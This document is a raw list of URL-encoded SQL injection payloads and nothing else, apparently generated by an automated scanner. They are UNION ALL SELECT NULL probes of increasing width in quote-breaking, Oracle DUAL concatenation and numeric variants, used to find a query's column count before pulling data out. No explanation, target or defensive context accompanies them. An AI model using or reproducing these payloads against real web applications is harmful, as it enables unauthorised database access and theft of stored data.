1%27%20WHERE%205082%3D5082%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%208341%3D8341%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%203687%3D3687%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%206275%3D6275%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%206687%3D6687%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%207803%3D7803%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%208228%3D8228%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%207545%3D7545%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%205549%3D5549%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%209725%3D9725%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%205481%3D5481%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20%7C%7C%20%28SELECT%204157%20FROM%20DUAL%20WHERE%202407%3D2407%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209868%20FROM%20DUAL%20WHERE%209992%3D9992%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209590%20FROM%20DUAL%20WHERE%207742%3D7742%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206382%20FROM%20DUAL%20WHERE%208579%3D8579%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208173%20FROM%20DUAL%20WHERE%204373%3D4373%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207459%20FROM%20DUAL%20WHERE%202757%3D2757%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202514%20FROM%20DUAL%20WHERE%204392%3D4392%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204801%20FROM%20DUAL%20WHERE%207557%3D7557%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202807%20FROM%20DUAL%20WHERE%209540%3D9540%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207188%20FROM%20DUAL%20WHERE%204344%3D4344%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206811%20WHERE%208296%3D8296%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204430%20WHERE%206552%3D6552%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207569%20WHERE%201434%3D1434%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205060%20WHERE%207902%3D7902%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206435%20WHERE%202083%3D2083%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209362%20WHERE%208375%3D8375%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209184%20WHERE%205373%3D5373%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207092%20WHERE%201624%3D1624%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208817%20WHERE%202241%3D2241%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206833%20WHERE%206662%3D6662%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%207733%20FROM%20DUAL%20WHERE%209928%3D9928%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%207620%20FROM%20DUAL%20WHERE%204592%3D4592%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%203536%20FROM%20DUAL%20WHERE%204426%3D4426%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%209627%20FROM%20DUAL%20WHERE%202218%3D2218%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 